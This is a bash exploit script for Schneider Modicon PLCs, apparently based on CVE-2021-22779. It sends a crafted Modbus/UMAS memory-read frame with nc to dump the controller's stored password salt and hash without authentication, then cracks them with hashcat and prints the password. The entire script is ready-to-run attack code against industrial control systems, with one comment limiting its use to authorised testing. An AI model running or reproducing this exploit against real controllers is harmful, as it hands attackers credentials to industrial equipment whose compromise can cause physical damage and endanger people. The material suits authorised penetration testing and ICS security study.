#!/usr/bin/env bash
# sudo apt install hashcat
# Banner: switch the terminal to green, print the logo + description, reset.
# The heredoc delimiter is quoted so backslashes and backticks in the art are
# emitted literally (same as the original single-quoted echo).
printf '\033[32m\n'
cat <<'BANNER'

_ _ ___
/\/\ ___ __| (_) / _ \__ _ ___ ___
/ \ / _ \ / _` | |/ /_)/ _` / __/ __|
/ /\/\ \ (_) | (_| | / ___/ (_| \__ \__ \
\/ \/\___/ \__,_|_\/ \__,_|___/___/
Schneider Modicon PLC exploit
hash dump and password crack
partial CVE-2021-22779

BANNER
printf '\033[0m\n'
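# Target controller: taken from the first argument when one is given (allows
# non-interactive use), otherwise prompted for. `read -r` keeps backslashes
# literal instead of letting read interpret them (SC2162).
IP=${1:-}
if [[ -z "$IP" ]]; then
  printf '%s\n' 'ENTER IP :'
  read -r IP
fi
PORT=502
# default modbus/umas port
FILE=modicon.hash
# file to store hash and salt (hashcat input, written in the current directory)
DICTIONARY=/usr/share/wordlists/rockyou.txt
# your preferred password dictionary
TIMEOUT=10
# seconds nc waits for the controller before giving up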
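# Only run this against controllers you are authorized to test: the
# unauthenticated memory read below is the vulnerability itself.

# --- sanity checks before touching the network -------------------------------
# IP is user input (read above). Refuse anything empty, containing whitespace,
# or starting with '-' so it cannot be word-split into extra nc options.
if [[ -z "$IP" || "$IP" == *[[:space:]]* || "$IP" == -* ]]; then
  printf 'ERROR: invalid target "%s"\n' "$IP" >&2
  exit 1
fi
for tool in nc strings base64 xxd hashcat; do
  if ! command -v "$tool" >/dev/null 2>&1; then
    printf 'ERROR: %s not found in PATH\n' "$tool" >&2
    exit 1
  fi
done
if [[ ! -r "$DICTIONARY" ]]; then
  printf 'ERROR: dictionary %s is not readable\n' "$DICTIONARY" >&2
  exit 1
fi

# --- dump the memory block holding the credential material -------------------
# Modbus/TCP frame: MBAP header (tid 0, proto 0, length 0x0d, unit 0x0b) followed
# by function 0x5a, the code Schneider uses to tunnel UMAS over Modbus. Per the
# author's note this is a "read memory block" request for block 20 (0x14) of
# 512 bytes (the trailing 0x00 0x02 appears to be the little-endian length),
# and the controller answers it without any authentication.
# `echo -ne` is the bash builtin here, so -n/-e are honoured and NUL bytes pass.
DUMP=$(echo -ne '\x00\x00\x00\x00\x00\x0d\x0b\x5a\x00\x20\x00\x14\x00\x00\x00\x00\x00\x00\x02' \
  | nc -w "$TIMEOUT" "$IP" "$PORT" | strings | tr '\t' ' ' | tr '\n' ' ')
# Author's alternative frame (0x01 at offset 10), kept for reference:
#DUMP=$(echo -ne '\x00\x00\x00\x00\x00\x0d\x0b\x5a\x00\x20\x01\x14\x00\x00\x00\x00\x00\x00\x02' | nc $IP $PORT | strings)
if [[ -z "${DUMP//[[:space:]]/}" ]]; then
  printf 'ERROR: no printable data from %s:%s within %ss (port closed, timeout, or unsupported device)\n' \
    "$IP" "$PORT" "$TIMEOUT" >&2
  exit 1
fi

# --- locate the base64 salt and hash in the reply ----------------------------
# The printable strings of the reply are treated as space-separated fields. The
# original author found the base64 salt and hash in fields 2 and 3, or shifted
# by one on some replies; the shift is detected by checking whether field 2
# decodes as base64. This layout assumption is brittle — NOTE(review): if a
# device answers with a different string layout, the fields below will be wrong.
is_b64() { base64 -d <<<"$1" >/dev/null 2>&1; }
SALT_B64=$(cut -d ' ' -f 2 <<<"$DUMP")
HASH_B64=$(cut -d ' ' -f 3 <<<"$DUMP")
if ! is_b64 "$SALT_B64"; then
  SALT_B64=$(cut -d ' ' -f 3 <<<"$DUMP")
  HASH_B64=$(cut -d ' ' -f 4 <<<"$DUMP")
fi
# Decode to raw bytes and hex-encode; tr -d '\n' joins xxd's 60-char lines so a
# long hash (or salt) ends up on one line for hashcat.
SALT=$(base64 -d <<<"$SALT_B64" | xxd -p | tr -d '\n')
HASH=$(base64 -d <<<"$HASH_B64" | xxd -p | tr -d '\n')
if [[ -z "$SALT" || -z "$HASH" ]]; then
  printf 'ERROR: could not extract salt/hash from reply: %s\n' "$DUMP" >&2
  exit 1
fi
printf 'SALT : %s\nHASH : %s\n' "$SALT" "$HASH"
# hashcat input line: hash:salt (same layout the original wrote).
printf '%s:%s\n' "$HASH" "$SALT" > "$FILE"

# --- crack ---------------------------------------------------------------------
# -m 1440 = sha256($salt.$pass); --hex-salt because the salt is raw bytes.
# Output is silenced as in the original, but the exit status is kept:
# 0 = cracked (or already in the potfile), 1 = dictionary exhausted,
# anything else = hashcat error (re-run without the redirection to see it).
hashcat -m 1440 --hex-salt "$FILE" "$DICTIONARY" >/dev/null 2>&1
rc=$?
case "$rc" in
  0) ;;
  1)
    printf 'PASS : not found in %s\n' "$DICTIONARY" >&2
    exit 1
    ;;
  *)
    printf 'ERROR: hashcat exited with status %s (run it manually on %s to see why)\n' "$rc" "$FILE" >&2
    exit "$rc"
    ;;
esac
# --show prints hash:salt:password; keep everything from the 3rd field on so a
# password containing ':' is not truncated.
PASS=$(hashcat -m 1440 --hex-salt "$FILE" --show | cut -d ':' -f 3-)
printf 'PASS : %s\n' "$PASS"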